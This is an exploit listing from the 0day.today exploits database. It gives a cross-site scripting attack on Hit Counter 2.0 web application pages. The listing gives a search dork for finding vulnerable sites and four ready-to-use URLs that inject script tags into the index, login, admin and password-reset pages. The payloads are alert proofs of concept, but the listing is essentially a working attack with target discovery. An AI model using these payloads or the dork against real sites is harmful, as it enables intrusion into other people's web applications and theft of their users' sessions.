[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hit Counter 2.0 Cross Site Scripting Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11252
Category
web applications
Date add
10-03-2010
Platform
unsorted
==================================================	
Hit Counter 2.0 Cross Site Scripting Vulnerability
==================================================

| # Dork : Powered by Hit Counter v2.0 (c) eTek Systems

| # Tested on: windows SP2 Fran?§ais V.(Pnx2 2.0) + Lunix
Fran?§ais v.(9.4 Ubuntu)
| # Bug : XSS

====================== Exploit By indoushka
=================================
# Exploit :

1- XSS (Cross Site Scripting in URI)

http://server/ww-hc20/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://server/ww-hc20/inc/login.php/>'><ScRiPt>alert(213771818860)</ScRiPt>


http://server/ww-hc20/admin/index.php/>'><ScRiPt>alert(213771818860)</ScRiP
t>

http://server/ww-hc20/admin/forgot.php/>"><ScRiPt>alert(213771818860)</ScRi
Pt>




#  0day.today [2024-11-16]  #